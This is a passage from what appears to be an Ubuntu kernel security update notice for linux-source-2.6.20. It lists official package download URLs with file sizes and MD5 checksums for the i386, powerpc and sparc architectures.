http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.31_i386.deb\n      Size/MD5: 23587990 69734d888bdbe1417f6c88b03f5e4ff8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.31_i386.deb\n      Size/MD5: 24165892 e9f0dd3a1cbed9f4c275bc35d31427fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb\n      Size/MD5: 25658356 5d4b95dbe14f67113a961a5a419d8ef8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.31_i386.deb\n      Size/MD5: 24393594 720c451484e4e17ecfdfbb0036aa6506\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_i386.deb\n      Size/MD5:   667938 2b7ff6cd306c617c326433b931e216f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   244602 e913dcb61ef84b6627b7f18237a712d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   250124 7f2228c4ab74af27fba4bb22462263ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   132546 40311392b60143adc9fe23f3dd38cfb7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   133078 ca3ce80ba0b75545dc34638b5e3e3093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   213188 4e288fe10dcec0c1392ceba87aefa0b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   220604 293c95c215960ad9c8179b1b87badb2a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:  1110410 75deb32ca249568e08b0c5b2ed5cabf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:  1110518 ce208c014af3ccfd3be5a22140bf3409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:  1951376 e21d5a4cfae2c7abd52ce321a31da6e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:  1974734 db0e2ba53b60a7f75f7dab6846d1b84e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   149860 a4f1351290e30f1c4e7260eda9f88848\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   142502 6f7279214ccebd2ebae2e3e07c0366cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   160736 2a5196a2451a69a95ac4081ee383d047\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   161936 2ee85739f55c9c48454ecff39fa5cc2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   252950 e6d25fb7085fa024c8215794bf41cf7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   255524 ad476aca2e64994e4996e174f0129d01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    32766 355e4201f652623ba7a425a455ddd591\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    33336 84393db083655e4746ee5f8872d1634c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    38030 3cd77914f9e2a14b45bffdbcb7afd379\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    38304 312bae8ca1298fb78eeb5f2c14024b1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    81860 01a489568d19811b95dbda49807e554c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    82094 916c336e60e8e5a6c3ded678daf3eb67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    47686 a554ef6d1fc404b299b2ca9eab600052\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    47720 e4bd92d0011d9968e3b11a2b53ad898d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:     8262 215b2b44f65782e91f246c9892c36d9b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:     8496 8325dd4d7645b52215c584ee313090c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    49958 b7fdb76f7e7b9b53bdfb61d5b4cbaf02\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    51874 b4cd612bd943018b048d33fc01e5b86b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    78852 6017590ac379305f3582cb580c53d69c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    79498 d54d0bf75b57827e777227bf42aa6696\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   322544 83fb94754d28fef49f55abe43d7210d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   322558 3f453982483722a158b076654a2cbf13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:  1362526 a4592f0dd429f6e30cc099f576875724\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:  1347968 e1eff7dc50dda5e62f0048d5b79c9cb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    42454 b9ed0551f44707a796103007e701ea7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    42232 3bf62f9da0492ea4b89c5e97e2331d6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    10764 e4256b9c2b4c127c58a9767480e54fae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    11400 379056a56e93d6f937eed48d688a8b1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    55990 4f518d325713f1236e4b0a25f8dd7b52\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    56906 4b4737720e477381e0fb36dd4144bfbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   360292 771d1ef6457a09df95544efd1e60eb06\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   363244 35c8893c56a7d607a710053281fbbf91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    63174 3b76dd2a0add8ca514ad29439f68eecb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    63822 c53f0bbf1e69c2640ac21d28686511fd\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb\n      Size/MD5: 23844340 0983e69e816ab28b4b64e334402783e8\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb\n      Size/MD5: 24183898 e8003d1d07e9a8c1406a4015b69c6c3b\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   328852 a7cd45e2be9e7e24b69bddedd50bfdb4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   325564 1ef1df8e755a7a5b77b8581619c89ee0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    41192 1cac100551f5e4b6b0e2ae199611864b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    47458 9b33803ceac1d9870c77519d76a04ca2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   219676 9b9cd2b6baf413bdca155456830c6f17\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   239174 5f1653e0836212e88ba2311f02f87620\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    43658 bcfd2536cffc99bea761590c172ff275\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    39788 24d008470a22eec523ccdae1a2deefa6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   717810 bfd614b17ec4871312b6d3ac5a9a5bc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   776474 8f19375582c1eaf502b12eecb6654ab1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   205086 15c27cf635e6df1a0a3002244c6df7b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   209732 41f77baa8bd624a3e308020161ef65a6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    59220 8edd5472ed0b49960ef60d5a08938662\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    66868 c9eab04b79d1d69cb0413a2baa82b032\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    64208 dc65a0af2c574e8be115966b8546a8b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    65334 645b7161988b7d45de3909ec5495f9f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   144020 d3bd7f70c349f7c3f418e1874e1fd3b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   162728 9e4d6c1014ee67ac7936ae633e5b8c40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   383368 0e4c1db36a8fb12a4ed0ad6f1812cd51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   251816 60e37f8e82d11c812da0a5fc13956ff0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:  2157386 9f989874c520ef7162ff584b1b46c57c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:  3083276 9593e34c7bdd87099e52fc6c9b895cab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb\n      Size/MD5:   862972 b92ce0da33fa2ec26026fc0953fb08e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb\n      Size/MD5:   871242 3c5ab3bbae356d7f871ce32467dc5be3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb\n      Size/MD5:   861158 1b4608e402fe83c9fc98c61901e78d66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_powerpc.deb\n      Size/MD5:  8149744 6da619f7644f352241474fe8c477fb74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb\n      Size/MD5: 24515980 660232361f3989d0410feb6a6db7b0d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb\n      Size/MD5: 26857602 9264e9266e6cb960f827f92d36f40548\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb\n      Size/MD5: 24218060 aab7fc0aad04b0de9413623ad31d1b2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb\n      Size/MD5:  2127114 a5fc2cbbb33a5347bebfbc6e163ebe80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb\n      Size/MD5:  2853502 6c53e0efb48f37a924a29250f943f817\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb\n      Size/MD5:  2048790 d653fc70fe49dc380023d2a5498936e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_powerpc.deb\n      Size/MD5:   644014 9da17f10f2d56ea22b65fa98926800cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   253018 d277f40b34880f91bb2c056aff6ac944\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   295082 58819ea33818cb4aeb48cfdae6395a98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   155556 495756400fc7ec91ab232f3ebd89d385\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   168438 78fe49aa32d9e4500fc43ae59cb60d7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   248196 4974d3b007dfe46ce42a2b06c8e17e32\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   279960 a1e9f0007ab0df9f948fdfed5cc26770\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:  1110514 16d9506e2af45001d4ff88cf090190d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:  1110664 3093478896f990fc5843a9fac313ca99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:  1951274 1ce8ec5d210a625754b051707ac2f007\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:  2253544 4cec0807f70fea6b523482e17a8c3f3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   233510 d8a0602f850212b4033bf6d0d3f548b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   223082 8423289edb7f8b98d8d137fa50bf2cd2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   172830 ec4875ed04bf8fe234b1d077edfe2530\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   205458 d6dcff3d393701c4e74a40ea1fad791f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   280984 0677e9ed958f75e003c1be08c278e39a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   316602 2635b1021b00635ecf2fe2b165f878ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    44660 99af30e421d82a3ee7ab8dd830b3279e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    43412 8e3266956a0680df84b833337a9e7052\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    41214 fb70bee40375248794dedfdec971d05d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    53688 6e3d3491ba08fbbfa24c667ba03b010f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    72816 c0555aa557ec4f17de285bdf860289fa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    85290 7701eef53b049cef94049934db28a53f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    74544 3371da9e68ff23fa9a44ab4be9594817\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    29718 0cf514c1aec245368814c31543c058fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:     8400 eaf01ca132467927b60e01de21c964c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:     9882 f369668ec2986b9bb2e835c792f53a5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    56160 f7ebbeedcf2f88cf4ca321351c9da193\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    67414 89742f040e6be6207bda53276f2633eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    86638 c793c199e9b5b47ea0cd6e1b4a0cf077\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   129208 fcb49eab78230ea9fc2f96b5228641a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   322566 5ec4f9114292dbe0dee389083f12d26b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   322590 48cabc807eef249b4594d8c381a81363\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:  1415824 bfbba6cfea2b470d8a97e9a4d4f88b9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:  1345416 759d88182f74baff59cf7a96aa6642f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    74232 37b357240eec1bc03aee9b33c3722295\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    83246 b61bcb2c2c62ad88ff41809426778567\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    12016 93ede1fbe9359ed417f07a091a4d9819\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    13946 10c51757e6febf19e2d3417335ef5766\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    78350 16e3593d499463b13dd71d9d09b688eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    85458 946690439579373ea1826342220071cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   398198 d840472b2574e16ea6f44c5f45427de6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   445188 ee7e96c614a00d1137483658a5450c0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:    76716 782937e9d57c10902d871b281cf62515\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb\n      Size/MD5:   100188 7dd8d77b380f4b3d7a656532510c775f\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    53734 56e3639109c91b9c70151398b3837add\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    42156 01eaf1c77f77ac711cbfa3b6bd7c9ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   211712 79f67c0341bc145590ca2485f7364824\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   607888 